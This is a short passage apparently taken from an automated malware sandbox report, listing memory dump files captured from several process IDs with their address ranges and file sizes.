    • memory/932-10-0x000000001AC70000-0x000000001AC71000-memory.dmp
      Filesize

      4KB

    • memory/932-9-0x000000001A8A0000-0x000000001A8A1000-memory.dmp
      Filesize

      4KB

    • memory/1064-37-0x0000000000000000-mapping.dmp
    • memory/1564-43-0x000007FEF7C10000-0x000007FEF7E8A000-memory.dmp
      Filesize

      2.5MB

    • memory/1684-2-0x0000000072DC1000-0x0000000072DC4000-memory.dmp
      Filesize

      12KB

    • memory/1684-3-0x0000000070841000-0x0000000070843000-memory.dmp
      Filesize

      8KB

    • memory/1684-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1740-17-0x0000000000000000-mapping.dmp
    • memory/1780-25-0x0000000000000000-mapping.dmp
    • memory/1952-31-0x0000000000100000-0x0000000000120000-memory.dmp
      Filesize

      128KB

    • memory/1952-32-0x0000000010000000-0x0000000010023000-memory.dmp
      Filesize

      140KB

    • memory/1952-20-0x00000000756A1000-0x00000000756A3000-memory.dmp
      Filesize

      8KB

    • memory/1952-19-0x0000000000000000-mapping.dmp